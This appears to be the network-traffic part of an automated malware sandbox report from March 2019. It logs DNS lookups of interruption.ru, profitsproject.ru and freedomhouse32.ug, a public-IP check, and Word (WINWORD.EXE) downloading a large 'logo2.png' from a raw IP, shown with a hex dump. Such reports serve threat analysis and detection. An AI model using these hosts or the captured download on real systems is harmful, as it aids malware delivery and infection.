                    Mr 20, 2019 16:38:58.906246901 MEZ6182853192.168.1.83208.67.222.222
                    Mr 20, 2019 16:38:58.922560930 MEZ5361828208.67.222.222192.168.1.83
                    Mr 20, 2019 16:38:59.126365900 MEZ5697253192.168.1.838.8.8.8
                    Mr 20, 2019 16:38:59.159744024 MEZ53569728.8.8.8192.168.1.83
                    Mr 20, 2019 16:38:59.173799038 MEZ6394553192.168.1.838.8.8.8
                    Mr 20, 2019 16:38:59.840430975 MEZ53639458.8.8.8192.168.1.83
                    Mr 20, 2019 16:38:59.851109982 MEZ6198853192.168.1.838.8.8.8
                    Mr 20, 2019 16:39:00.427411079 MEZ53619888.8.8.8192.168.1.83
                    Mr 20, 2019 16:39:00.429891109 MEZ4920680192.168.1.8337.152.176.90
                    Mr 20, 2019 16:39:00.571136951 MEZ804920637.152.176.90192.168.1.83
                    Mr 20, 2019 16:39:00.571458101 MEZ4920680192.168.1.8337.152.176.90
                    Mr 20, 2019 16:39:00.572242022 MEZ4920680192.168.1.8337.152.176.90
                    Mr 20, 2019 16:39:00.889132977 MEZ804920637.152.176.90192.168.1.83
                    Mr 20, 2019 16:39:01.055056095 MEZ804920637.152.176.90192.168.1.83
                    Mr 20, 2019 16:39:01.055085897 MEZ804920637.152.176.90192.168.1.83
                    Mr 20, 2019 16:39:01.055833101 MEZ4920680192.168.1.8337.152.176.90
                    Mr 20, 2019 16:39:01.056127071 MEZ4920680192.168.1.8337.152.176.90
                    Mr 20, 2019 16:39:01.666851997 MEZ4920680192.168.1.8337.152.176.90
                    Mr 20, 2019 16:39:01.808197975 MEZ804920637.152.176.90192.168.1.83
                    Mr 20, 2019 16:39:08.517499924 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:39:11.162586927 MEZ6134053192.168.1.838.8.8.8
                    Mr 20, 2019 16:39:11.190550089 MEZ53613408.8.8.8192.168.1.83
                    Mr 20, 2019 16:39:11.202714920 MEZ5881653192.168.1.838.8.8.8
                    Mr 20, 2019 16:39:11.837717056 MEZ53588168.8.8.8192.168.1.83
                    Mr 20, 2019 16:39:11.840306997 MEZ4920780192.168.1.8346.139.176.151
                    Mr 20, 2019 16:39:11.896213055 MEZ804920746.139.176.151192.168.1.83
                    Mr 20, 2019 16:39:11.896629095 MEZ4920780192.168.1.8346.139.176.151
                    Mr 20, 2019 16:39:11.897363901 MEZ4920780192.168.1.8346.139.176.151
                    Mr 20, 2019 16:39:11.897511005 MEZ4920780192.168.1.8346.139.176.151
                    Mr 20, 2019 16:39:11.940166950 MEZ804920746.139.176.151192.168.1.83
                    Mr 20, 2019 16:39:12.168243885 MEZ804920746.139.176.151192.168.1.83
                    Mr 20, 2019 16:39:12.171703100 MEZ804920746.139.176.151192.168.1.83
                    Mr 20, 2019 16:39:12.172050953 MEZ4920780192.168.1.8346.139.176.151
                    Mr 20, 2019 16:39:12.172677040 MEZ4920780192.168.1.8346.139.176.151
                    Mr 20, 2019 16:39:12.216155052 MEZ804920746.139.176.151192.168.1.83
                    Mr 20, 2019 16:39:20.913786888 MEZ5881753192.168.1.838.8.8.8
                    Mr 20, 2019 16:39:20.943079948 MEZ53588178.8.8.8192.168.1.83
                    Mr 20, 2019 16:39:20.950294971 MEZ5881853192.168.1.838.8.8.8
                    Mr 20, 2019 16:39:20.963593006 MEZ53588188.8.8.8192.168.1.83

                    UDP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Mr 20, 2019 16:38:55.261363983 MEZ5111453192.168.1.838.8.8.8
                    Mr 20, 2019 16:38:55.741086960 MEZ53511148.8.8.8192.168.1.83
                    Mr 20, 2019 16:38:55.762423038 MEZ5568453192.168.1.838.8.8.8
                    Mr 20, 2019 16:38:56.211323023 MEZ53556848.8.8.8192.168.1.83
                    Mr 20, 2019 16:38:58.853560925 MEZ6182553192.168.1.838.8.8.8
                    Mr 20, 2019 16:38:58.865964890 MEZ53618258.8.8.8192.168.1.83
                    Mr 20, 2019 16:38:58.869601965 MEZ6182653192.168.1.83208.67.222.222
                    Mr 20, 2019 16:38:58.885890007 MEZ5361826208.67.222.222192.168.1.83
                    Mr 20, 2019 16:38:58.888394117 MEZ6182753192.168.1.83208.67.222.222
                    Mr 20, 2019 16:38:58.904824972 MEZ5361827208.67.222.222192.168.1.83
                    Mr 20, 2019 16:38:58.906246901 MEZ6182853192.168.1.83208.67.222.222
                    Mr 20, 2019 16:38:58.922560930 MEZ5361828208.67.222.222192.168.1.83
                    Mr 20, 2019 16:38:59.126365900 MEZ5697253192.168.1.838.8.8.8
                    Mr 20, 2019 16:38:59.159744024 MEZ53569728.8.8.8192.168.1.83
                    Mr 20, 2019 16:38:59.173799038 MEZ6394553192.168.1.838.8.8.8
                    Mr 20, 2019 16:38:59.840430975 MEZ53639458.8.8.8192.168.1.83
                    Mr 20, 2019 16:38:59.851109982 MEZ6198853192.168.1.838.8.8.8
                    Mr 20, 2019 16:39:00.427411079 MEZ53619888.8.8.8192.168.1.83
                    Mr 20, 2019 16:39:11.162586927 MEZ6134053192.168.1.838.8.8.8
                    Mr 20, 2019 16:39:11.190550089 MEZ53613408.8.8.8192.168.1.83
                    Mr 20, 2019 16:39:11.202714920 MEZ5881653192.168.1.838.8.8.8
                    Mr 20, 2019 16:39:11.837717056 MEZ53588168.8.8.8192.168.1.83
                    Mr 20, 2019 16:39:20.913786888 MEZ5881753192.168.1.838.8.8.8
                    Mr 20, 2019 16:39:20.943079948 MEZ53588178.8.8.8192.168.1.83
                    Mr 20, 2019 16:39:20.950294971 MEZ5881853192.168.1.838.8.8.8
                    Mr 20, 2019 16:39:20.963593006 MEZ53588188.8.8.8192.168.1.83

                    DNS Queries

                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                    Mr 20, 2019 16:38:55.261363983 MEZ192.168.1.838.8.8.80x3154Standard query (0)interruption.ruA (IP address)IN (0x0001)
                    Mr 20, 2019 16:38:55.762423038 MEZ192.168.1.838.8.8.80x2e44Standard query (0)interruption.ruA (IP address)IN (0x0001)
                    Mr 20, 2019 16:38:58.853560925 MEZ192.168.1.838.8.8.80x7cb7Standard query (0)resolver1.opendns.comA (IP address)IN (0x0001)
                    Mr 20, 2019 16:38:58.869601965 MEZ192.168.1.83208.67.222.2220x1Standard query (0)222.222.67.208.in-addr.arpaPTR (Pointer record)IN (0x0001)
                    Mr 20, 2019 16:38:58.888394117 MEZ192.168.1.83208.67.222.2220x2Standard query (0)myip.opendns.comA (IP address)IN (0x0001)
                    Mr 20, 2019 16:38:58.906246901 MEZ192.168.1.83208.67.222.2220x3Standard query (0)myip.opendns.com28IN (0x0001)
                    Mr 20, 2019 16:38:59.126365900 MEZ192.168.1.838.8.8.80x3be4Standard query (0)freedomhouse32.ugA (IP address)IN (0x0001)
                    Mr 20, 2019 16:38:59.173799038 MEZ192.168.1.838.8.8.80xc413Standard query (0)profitsproject.ruA (IP address)IN (0x0001)
                    Mr 20, 2019 16:38:59.851109982 MEZ192.168.1.838.8.8.80x89eaStandard query (0)profitsproject.ruA (IP address)IN (0x0001)
                    Mr 20, 2019 16:39:11.162586927 MEZ192.168.1.838.8.8.80x9dccStandard query (0)profitsproject.ruA (IP address)IN (0x0001)
                    Mr 20, 2019 16:39:11.202714920 MEZ192.168.1.838.8.8.80x6ed9Standard query (0)profitsproject.ruA (IP address)IN (0x0001)
                    Mr 20, 2019 16:39:20.913786888 MEZ192.168.1.838.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                    Mr 20, 2019 16:39:20.950294971 MEZ192.168.1.838.8.8.80x2Standard query (0)1.0.0.127.in-addr.arpaPTR (Pointer record)IN (0x0001)

                    DNS Answers

                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                    Mr 20, 2019 16:38:55.741086960 MEZ8.8.8.8192.168.1.830x3154No error (0)interruption.ru178.169.196.83A (IP address)IN (0x0001)
                    Mr 20, 2019 16:38:55.741086960 MEZ8.8.8.8192.168.1.830x3154No error (0)interruption.ru46.139.176.151A (IP address)IN (0x0001)
                    Mr 20, 2019 16:38:55.741086960 MEZ8.8.8.8192.168.1.830x3154No error (0)interruption.ru193.33.1.18A (IP address)IN (0x0001)
                    Mr 20, 2019 16:38:55.741086960 MEZ8.8.8.8192.168.1.830x3154No error (0)interruption.ru197.255.246.6A (IP address)IN (0x0001)
                    Mr 20, 2019 16:38:55.741086960 MEZ8.8.8.8192.168.1.830x3154No error (0)interruption.ru37.152.176.90A (IP address)IN (0x0001)
                    Mr 20, 2019 16:38:55.741086960 MEZ8.8.8.8192.168.1.830x3154No error (0)interruption.ru188.142.189.159A (IP address)IN (0x0001)
                    Mr 20, 2019 16:38:55.741086960 MEZ8.8.8.8192.168.1.830x3154No error (0)interruption.ru109.175.7.8A (IP address)IN (0x0001)
                    Mr 20, 2019 16:38:55.741086960 MEZ8.8.8.8192.168.1.830x3154No error (0)interruption.ru151.237.80.80A (IP address)IN (0x0001)
                    Mr 20, 2019 16:38:55.741086960 MEZ8.8.8.8192.168.1.830x3154No error (0)interruption.ru2.89.154.18A (IP address)IN (0x0001)
                    Mr 20, 2019 16:38:55.741086960 MEZ8.8.8.8192.168.1.830x3154No error (0)interruption.ru46.10.60.184A (IP address)IN (0x0001)
                    Mr 20, 2019 16:38:56.211323023 MEZ8.8.8.8192.168.1.830x2e44No error (0)interruption.ru46.10.60.184A (IP address)IN (0x0001)
                    Mr 20, 2019 16:38:56.211323023 MEZ8.8.8.8192.168.1.830x2e44No error (0)interruption.ru178.169.196.83A (IP address)IN (0x0001)
                    Mr 20, 2019 16:38:56.211323023 MEZ8.8.8.8192.168.1.830x2e44No error (0)interruption.ru46.139.176.151A (IP address)IN (0x0001)
                    Mr 20, 2019 16:38:56.211323023 MEZ8.8.8.8192.168.1.830x2e44No error (0)interruption.ru193.33.1.18A (IP address)IN (0x0001)
                    Mr 20, 2019 16:38:56.211323023 MEZ8.8.8.8192.168.1.830x2e44No error (0)interruption.ru197.255.246.6A (IP address)IN (0x0001)
                    Mr 20, 2019 16:38:56.211323023 MEZ8.8.8.8192.168.1.830x2e44No error (0)interruption.ru37.152.176.90A (IP address)IN (0x0001)
                    Mr 20, 2019 16:38:56.211323023 MEZ8.8.8.8192.168.1.830x2e44No error (0)interruption.ru188.142.189.159A (IP address)IN (0x0001)
                    Mr 20, 2019 16:38:56.211323023 MEZ8.8.8.8192.168.1.830x2e44No error (0)interruption.ru109.175.7.8A (IP address)IN (0x0001)
                    Mr 20, 2019 16:38:56.211323023 MEZ8.8.8.8192.168.1.830x2e44No error (0)interruption.ru151.237.80.80A (IP address)IN (0x0001)
                    Mr 20, 2019 16:38:56.211323023 MEZ8.8.8.8192.168.1.830x2e44No error (0)interruption.ru2.89.154.18A (IP address)IN (0x0001)
                    Mr 20, 2019 16:38:58.865964890 MEZ8.8.8.8192.168.1.830x7cb7No error (0)resolver1.opendns.com208.67.222.222A (IP address)IN (0x0001)
                    Mr 20, 2019 16:38:58.885890007 MEZ208.67.222.222192.168.1.830x1No error (0)222.222.67.208.in-addr.arpaPTR (Pointer record)IN (0x0001)
                    Mr 20, 2019 16:38:58.904824972 MEZ208.67.222.222192.168.1.830x2No error (0)myip.opendns.com185.189.150.76A (IP address)IN (0x0001)
                    Mr 20, 2019 16:38:58.922560930 MEZ208.67.222.222192.168.1.830x3Name error (3)myip.opendns.comnonenone28IN (0x0001)
                    Mr 20, 2019 16:38:59.159744024 MEZ8.8.8.8192.168.1.830x3be4Name error (3)freedomhouse32.ugnonenoneA (IP address)IN (0x0001)
                    Mr 20, 2019 16:38:59.840430975 MEZ8.8.8.8192.168.1.830xc413No error (0)profitsproject.ru37.152.176.90A (IP address)IN (0x0001)
                    Mr 20, 2019 16:38:59.840430975 MEZ8.8.8.8192.168.1.830xc413No error (0)profitsproject.ru188.142.189.159A (IP address)IN (0x0001)
                    Mr 20, 2019 16:38:59.840430975 MEZ8.8.8.8192.168.1.830xc413No error (0)profitsproject.ru109.175.7.8A (IP address)IN (0x0001)
                    Mr 20, 2019 16:38:59.840430975 MEZ8.8.8.8192.168.1.830xc413No error (0)profitsproject.ru151.237.80.80A (IP address)IN (0x0001)
                    Mr 20, 2019 16:38:59.840430975 MEZ8.8.8.8192.168.1.830xc413No error (0)profitsproject.ru2.89.154.18A (IP address)IN (0x0001)
                    Mr 20, 2019 16:38:59.840430975 MEZ8.8.8.8192.168.1.830xc413No error (0)profitsproject.ru46.10.60.184A (IP address)IN (0x0001)
                    Mr 20, 2019 16:38:59.840430975 MEZ8.8.8.8192.168.1.830xc413No error (0)profitsproject.ru178.169.196.83A (IP address)IN (0x0001)
                    Mr 20, 2019 16:38:59.840430975 MEZ8.8.8.8192.168.1.830xc413No error (0)profitsproject.ru46.139.176.151A (IP address)IN (0x0001)
                    Mr 20, 2019 16:38:59.840430975 MEZ8.8.8.8192.168.1.830xc413No error (0)profitsproject.ru193.33.1.18A (IP address)IN (0x0001)
                    Mr 20, 2019 16:38:59.840430975 MEZ8.8.8.8192.168.1.830xc413No error (0)profitsproject.ru197.255.246.6A (IP address)IN (0x0001)
                    Mr 20, 2019 16:39:00.427411079 MEZ8.8.8.8192.168.1.830x89eaNo error (0)profitsproject.ru46.139.176.151A (IP address)IN (0x0001)
                    Mr 20, 2019 16:39:00.427411079 MEZ8.8.8.8192.168.1.830x89eaNo error (0)profitsproject.ru193.33.1.18A (IP address)IN (0x0001)
                    Mr 20, 2019 16:39:00.427411079 MEZ8.8.8.8192.168.1.830x89eaNo error (0)profitsproject.ru197.255.246.6A (IP address)IN (0x0001)
                    Mr 20, 2019 16:39:00.427411079 MEZ8.8.8.8192.168.1.830x89eaNo error (0)profitsproject.ru37.152.176.90A (IP address)IN (0x0001)
                    Mr 20, 2019 16:39:00.427411079 MEZ8.8.8.8192.168.1.830x89eaNo error (0)profitsproject.ru188.142.189.159A (IP address)IN (0x0001)
                    Mr 20, 2019 16:39:00.427411079 MEZ8.8.8.8192.168.1.830x89eaNo error (0)profitsproject.ru109.175.7.8A (IP address)IN (0x0001)
                    Mr 20, 2019 16:39:00.427411079 MEZ8.8.8.8192.168.1.830x89eaNo error (0)profitsproject.ru151.237.80.80A (IP address)IN (0x0001)
                    Mr 20, 2019 16:39:00.427411079 MEZ8.8.8.8192.168.1.830x89eaNo error (0)profitsproject.ru2.89.154.18A (IP address)IN (0x0001)
                    Mr 20, 2019 16:39:00.427411079 MEZ8.8.8.8192.168.1.830x89eaNo error (0)profitsproject.ru46.10.60.184A (IP address)IN (0x0001)
                    Mr 20, 2019 16:39:00.427411079 MEZ8.8.8.8192.168.1.830x89eaNo error (0)profitsproject.ru178.169.196.83A (IP address)IN (0x0001)
                    Mr 20, 2019 16:39:11.190550089 MEZ8.8.8.8192.168.1.830x9dccNo error (0)profitsproject.ru46.139.176.151A (IP address)IN (0x0001)
                    Mr 20, 2019 16:39:11.190550089 MEZ8.8.8.8192.168.1.830x9dccNo error (0)profitsproject.ru193.33.1.18A (IP address)IN (0x0001)
                    Mr 20, 2019 16:39:11.190550089 MEZ8.8.8.8192.168.1.830x9dccNo error (0)profitsproject.ru197.255.246.6A (IP address)IN (0x0001)
                    Mr 20, 2019 16:39:11.190550089 MEZ8.8.8.8192.168.1.830x9dccNo error (0)profitsproject.ru37.152.176.90A (IP address)IN (0x0001)
                    Mr 20, 2019 16:39:11.190550089 MEZ8.8.8.8192.168.1.830x9dccNo error (0)profitsproject.ru188.142.189.159A (IP address)IN (0x0001)
                    Mr 20, 2019 16:39:11.190550089 MEZ8.8.8.8192.168.1.830x9dccNo error (0)profitsproject.ru109.175.7.8A (IP address)IN (0x0001)
                    Mr 20, 2019 16:39:11.190550089 MEZ8.8.8.8192.168.1.830x9dccNo error (0)profitsproject.ru151.237.80.80A (IP address)IN (0x0001)
                    Mr 20, 2019 16:39:11.190550089 MEZ8.8.8.8192.168.1.830x9dccNo error (0)profitsproject.ru2.89.154.18A (IP address)IN (0x0001)
                    Mr 20, 2019 16:39:11.190550089 MEZ8.8.8.8192.168.1.830x9dccNo error (0)profitsproject.ru46.10.60.184A (IP address)IN (0x0001)
                    Mr 20, 2019 16:39:11.190550089 MEZ8.8.8.8192.168.1.830x9dccNo error (0)profitsproject.ru178.169.196.83A (IP address)IN (0x0001)
                    Mr 20, 2019 16:39:11.837717056 MEZ8.8.8.8192.168.1.830x6ed9No error (0)profitsproject.ru46.139.176.151A (IP address)IN (0x0001)
                    Mr 20, 2019 16:39:11.837717056 MEZ8.8.8.8192.168.1.830x6ed9No error (0)profitsproject.ru193.33.1.18A (IP address)IN (0x0001)
                    Mr 20, 2019 16:39:11.837717056 MEZ8.8.8.8192.168.1.830x6ed9No error (0)profitsproject.ru197.255.246.6A (IP address)IN (0x0001)
                    Mr 20, 2019 16:39:11.837717056 MEZ8.8.8.8192.168.1.830x6ed9No error (0)profitsproject.ru37.152.176.90A (IP address)IN (0x0001)
                    Mr 20, 2019 16:39:11.837717056 MEZ8.8.8.8192.168.1.830x6ed9No error (0)profitsproject.ru188.142.189.159A (IP address)IN (0x0001)
                    Mr 20, 2019 16:39:11.837717056 MEZ8.8.8.8192.168.1.830x6ed9No error (0)profitsproject.ru109.175.7.8A (IP address)IN (0x0001)
                    Mr 20, 2019 16:39:11.837717056 MEZ8.8.8.8192.168.1.830x6ed9No error (0)profitsproject.ru151.237.80.80A (IP address)IN (0x0001)
                    Mr 20, 2019 16:39:11.837717056 MEZ8.8.8.8192.168.1.830x6ed9No error (0)profitsproject.ru2.89.154.18A (IP address)IN (0x0001)
                    Mr 20, 2019 16:39:11.837717056 MEZ8.8.8.8192.168.1.830x6ed9No error (0)profitsproject.ru46.10.60.184A (IP address)IN (0x0001)
                    Mr 20, 2019 16:39:11.837717056 MEZ8.8.8.8192.168.1.830x6ed9No error (0)profitsproject.ru178.169.196.83A (IP address)IN (0x0001)
                    Mr 20, 2019 16:39:20.943079948 MEZ8.8.8.8192.168.1.830x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                    Mr 20, 2019 16:39:20.963593006 MEZ8.8.8.8192.168.1.830x2Name error (3)1.0.0.127.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)

                    HTTP Request Dependency Graph

                    • 31.148.219.163
                    • interruption.ru
                    • profitsproject.ru

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    0192.168.1.834920431.148.219.16380C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    TimestampkBytes transferredDirectionData
                    Mr 20, 2019 16:37:49.667716980 MEZ0OUTGET /images/logo2.png HTTP/1.1
                    Accept: */*
                    Accept-Language: en-us
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                    Host: 31.148.219.163
                    Connection: Keep-Alive
                    Mr 20, 2019 16:37:49.700239897 MEZ1INHTTP/1.1 200 OK
                    Date: Wed, 20 Mar 2019 15:37:47 GMT
                    Server: Apache/2.4.6 (CentOS)
                    Last-Modified: Mon, 18 Mar 2019 19:04:42 GMT
                    ETag: "bf548-584630f9b0680"
                    Accept-Ranges: bytes
                    Content-Length: 783688
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                    Content-Type: image/png
                    Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 04 00 00 00 02 ce 08 06 00 00 00 37 2f 61 7d 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 20 00 49 44 41 54 78 9c ec dd 79 74 54 65 9e ff f1 77 55 12 92 40 48 58 13 76 10 08 3b 41 09 84 7d df 91 4d 04 dc 10 d1 9f 6b db 8d da ce 0c 76 b7 33 e0 74 8f 4d f7 8c 8e d0 6e e0 82 1a 05 05 01 21 84 b0 ef 81 b0 07 81 b0 05 08 09 7b d8 93 40 42 96 fa fd 51 e2 d8 2a a4 aa 72 6f dd 4a f2 79 9d 73 0f 1e ce 7d 9e ef 07 9a 56 ea 5b cf 62 03 92 81 76 88 88 88 88 88 94 4d 37 81 dc 9f fd 5c 01 90 05 14 02 d7 81 3c e0 06 90 03 dc 02 ae fd f0 73 57 7f e5 b9 f2 93 7f be 0c 38 4c ff 15 88 88 18 c0 df ea 00 22 22 22 22 22 26 0b fe e1 f9 b9 9a 06 cc 5d 08 64 02 17 80 b3 3f fc 98 09 9c f9 c9 8f a7 80 93 38 1b 11 22 22 96 b1 a1 15 00 22 22 22 22 22 de 70 09 67 33 20 fd 87 e7 76 63 20 15 38 86 73 35 81 88 88 69 b4 02 40 44 44 44 44 c4 3b aa ff f0 dc e9 cb b7 cb 38 9b 01 b7 1b 02 47 7f 78 0e e2 dc 92 20 22 52 22 5a 01 20 22 22 22 22 e2 fb ae 00 29 c0 81 9f fc f8 3d ce 2d 07 22 22 2e 51 03 40 44 44 44 44 a4 f4 3a 05 ec f9 d9 73 d2 d2 44 22 e2 b3 d4 00 10 11 11 11 11 29 5b 2e 03 bb 71 36 03 76 03 db 80 13 96 26 12 11 9f a0 06 80 88 88 88 88 48 d9 77 0d d8 01 24 02 bb 80 cd 38 b7 15 88 48 39 a2 06 80 88 88 88 88 48 f9 53 88 f3 2c 81 2d c0 26 60 3d 70 da ca 40 22 62 3e 35 00 44 44 44 44 44 04 e0 2c ce 95 01 ab 71 ae 14 38 60 6d 1c 11 31 9a cb 0d 80 80 80 00 42 42 42 cc 4f 24 22 22 22 22 62 90 ec ec 6c f2 f3 f3 ad 8e 51 5a a5 03 eb 80 55 38 9b 02 e7 ad 8d 23 22 25 e5 72 03 60 e8 d0 a1 c4 c7 c7 9b 9f 48 44 44 44 44 c4 44 85 85 85 5c bf 7e 1d 80 9c 9c 1c 6e dd ba c5 d5 ab 57 29 28 28 e0 fa f5 eb e4 e6 e6 72 f3 e6 4d ae 5f bf ce d5 ab 57 7f f5 b9 72 e5 0a 97 2e 5d 22 33 33 93 c2 c2 42 8b 7f 45 5e 73 1c 67 23 60 35 b0 1c c8 b2 36 8e 88 b8 cb df ea 00 22 22 22 22 22 de e4 e7 e7 47 d5 aa 55 01 7e fc d1 53 0e 87 83 cc cc 4c 2e 5c b8 c0 85 0b 17 38 7b f6 2c 99 99 99 9c 3f 7f 9e 33 67 ce 90 9e 9e ce a9 53 a7 c8 c8 c8 20 2f 2f cf 88 f8 56 6a 0c 3c fb c3 73 13 e7 76 81 04 20 0e 48 b5 30 97 88 b8 48 0d 00 11 11 11 11 11 0f d9 6c 36 c2 c3 c3 09 0f 0f 2f f6 dd f3 e7 cf 93 91 91 c1 a9 53 a7 48 4f 4f e7 c4 89 13 a4 a6 a6 92 9a 9a ca 89 13 27 4a 5b 83 20 18 18 f0 c3 f3 36 ce d5 01 4b 71 36 03 36 02 b7 ac 8b 26 22 77 a2 2d 00 22 22 22 22 22 16 2b 2a 2a 22 23 23 e3 c7 86 c0 b1 63 c7 38 78 f0 20 29 29 29 a4 a5 a5 51 54 54 64 75 44 77 5c c1 b9 45 20 0e 88 07 ae 5b 1b 47 44 6e 53 03 40 44 44 44 44 c4 87 dd b8 71 e3 c7 66 c0 ed e7 c0 81 03 1c 3f 7e 1c 87 c3 61 75 bc e2 14 02 49 c0 7c e0 6b 74 90 a0 88 a5 d4 00 10 11 11 11 11 29 85 b2 b2 b2 f8 fe fb ef 39 70 e0 00 29 29 29 ec da b5 8b 1d 3b 76 f8 f2 56 82 9f 36 03 e6 e1 bc 76 50 44 bc 48 0d 00 11 11 11 11 91 32 22 37 37 97 7d fb f6
                    Data Ascii: PNGIHDR7/a}bKGD IDATxytTewU@HXv;A}Mkv3tMn!{@BQ*roJys}V[bvM7\<sW8L"""""&]d?8"""""""pg3 vc 8s5i@DDDD;8Gx "R"Z """")=-"".Q@DDDD:sD")[.q6v&Hw$8H9HS,-&`=p@"b>5DDDDD,q8`m1BBBO$""""blQZU8#"%r`HDDDDD\~nW)((rM_Wr.]"33BE^sg#`56"""""GU~SL.\8{,?3gS //Vj<sv H0Hl6/SHOO'J[ 6Kq66&"w-"""""+**"##c8x )))QTTduDw\E [GDnS@DDDDqf?~auI|kt)9p)));vV6vPDH2"77}
                    Mr 20, 2019 16:37:49.700280905 MEZ3INData Raw: b1 6b d7 2e b6 6d db c6 b6 6d db 38 74 e8 90 2f ae 14 28 c4 79 56 c0 1c 60 01 ce 6d 03 22 62 32 35 00 44 44 44 44 44 ca b0 db 2b 05 36 6f de 4c 62 62 22 49 49 49 64 66 66 5a 1d eb a7 f2 80 55 38 57 06 2c 00 72 ac 8d 23 52 76 a9 01 20 22 22 22 22
                    Data Ascii: k.mm8t/(yV`m"b25DDDDD+6oLbb"IIIdffZU8W,r#Rv """"R?~D6o+IKK:mE8WR@DH9a6lVG8G-"R& """""^f\mqRKoUXz5IIIX'Y[!RZ
                    Mr 20, 2019 16:37:49.700310946 MEZ4INData Raw: 67 f2 ee bb ef 72 f1 e2 45 b3 ca 5c 06 fe 0e cc 00 6e 9a 55 44 c4 0c 36 60 29 70 7f 71 2f de 7b ef bd ec d9 b3 c7 fc 44 3f b8 7c f9 32 d5 ab eb 26 0e 11 11 11 11 91 3b 69 d0 a0 01 f7 dd 77 1f 1d 3a 74 a0 73 e7 ce c4 c4 c4 10 1a 1a 6a 75 2c cb dd
                    Data Ascii: grE\nUD6`)pq/{D?|2&;iw:tsju,qXO*soC<U9rD?DDDDD`i%:ustVZgu4K8_-[*s#YDbc{v9/Pk5EDDDD0wN^
                    Mr 20, 2019 16:37:49.700342894 MEZ5INData Raw: e4 c9 93 59 b8 70 a1 91 d3 26 03 4f 01 7b 8c 9c 54 ca b7 db 77 5a 9c 74 e5 65 6f af 00 00 9d 03 20 22 22 22 22 52 56 9d 3f 7f 9e b7 de 7a 8b d6 ad 5b d3 a1 43 07 66 cd 9a c5 cd 9b 37 ad 8e e5 b6 a6 4d 9b b2 60 c1 02 d6 ad 5b 47 9b 36 6d 8c 9a f6
                    Data Ascii: Yp&O{TwZteo """"RV?z[Cf7M`[G6m^`tev 333uQ@DDDDk=u^VGr[{7oFLLye`JVt^5)?\3'!!T]'{?K/n/~P8"
                    Mr 20, 2019 16:37:49.700371027 MEZ6INData Raw: c5 73 cf 3d 47 66 66 a6 d5 71 7e a1 4a 95 2a c4 c6 c6 f2 f9 e7 9f 13 12 12 52 92 a9 fc 71 9e 09 f0 2d 10 6a 48 38 29 35 7e de 00 d8 e9 ea 40 6f 37 00 02 02 02 b8 ef be fb bc 5a 53 44 44 44 44 44 ca 8f fc fc 7c 66 cd 9a 45 cb 96 2d 99 3e 7d ba 4f
                    Data Ascii: s=Gffq~J*Rq-jH8)5~@o7ZSDDDDD|fE->}O^8avMtttIZ<?o$miwoKixBdd$IIIL:6#I&Zn+XGs'~y_Gaa0Z3eVXAK
                    Mr 20, 2019 16:37:49.700398922 MEZ8INData Raw: fc 7c 4b b3 54 ae 5c 99 45 8b 16 f1 e2 8b 2f 96 64 9a 17 80 58 20 c0 98 54 62 96 bb 9d 01 00 ce 6b 00 2f e0 5c de 71 57 7e 7e 7e 9c 3e 7d 9a 88 88 08 43 82 b9 6a d4 a8 51 2c 5e bc d8 ab 35 45 44 44 44 44 44 8c d0 a1 43 07 e6 ce 9d 4b d3 a6 4d ad
                    Data Ascii: |KT\E/dX Tbk/\qW~~~>}CjQ,^5EDDDDDCKM?^y4.w<q1;i=_}Q~EXSa#Oc-\>|8Wz]#dee1~x&L@vvYutZ<4
                    Mr 20, 2019 16:37:49.700427055 MEZ9INData Raw: 60 60 a0 87 a5 3c 93 9b 9b 4b e3 c6 8d 39 7b f6 ac 57 eb 8a 88 88 88 88 88 58 25 24 24 84 39 73 e6 30 7c f8 70 4b ea 6f da b4 89 21 43 86 90 93 93 e3 c9 f0 75 38 57 9c e7 1a 9b 4a 6e 73 f7 0c 80 db ce 00 2e 1d b7 9f 93 93 43 f3 e6 cd 89 8a 8a f2
                    Data Ascii: ``<K9{WX%$$9s0|pKo!Cu8WJns.Cgg5^+"""""b[n1o<"""7l={2o<Onh|N<nd}q3gO{Xsm>tHp8Xt)i;vdh,S
                    Mr 20, 2019 16:37:49.700454950 MEZ10INData Raw: 88 88 88 88 88 af b1 db ed 7c f0 c1 07 3c fb ec b3 5e ad bb 73 e7 4e fa f4 e9 43 76 76 b6 bb 43 4f e3 6c 02 9c 31 3e 55 d9 63 e4 19 00 e0 5c 05 70 0d 18 ed ca cb 05 05 05 64 65 65 31 62 c4 08 83 63 b8 a6 4f 9f 3e 7c fd f5 d7 5c b9 72 c5 92 fa 22
                    Data Ascii: |<^sNCvvCOl1>Uc\pdee1bcO>|\r""""""pOZ:u=4 IDAT+Cn\3vXjiBPm!66EDDDDD|ehQQ.ffQzuOl4l1Q\TTDZZ>Q
                    Mr 20, 2019 16:37:49.700480938 MEZ11INData Raw: f6 ec e9 c9 cd 00 0b 80 31 26 44 2a 15 ac 68 00 04 03 fb 81 c6 ae 0e e8 df bf 3f 2b 57 ae b4 6c 2b 00 c0 e5 cb 97 89 89 89 e1 d8 b1 63 96 65 10 11 11 11 11 11 f1 55 01 01 01 24 24 24 d0 af 5f 3f af d4 cb c8 c8 20 3a 3a 9a cc 4c 97 cf 9b bf ed 39
                    Data Ascii: 1&D*h?+Wl+ceU$$$_? ::L9`|nXz5Iq\SZ5-ZDXX9DDDDDD|Q~~>c^W~};Q&DyV4n8p8i-/&00""""""+:o=_?^uwspN/W.
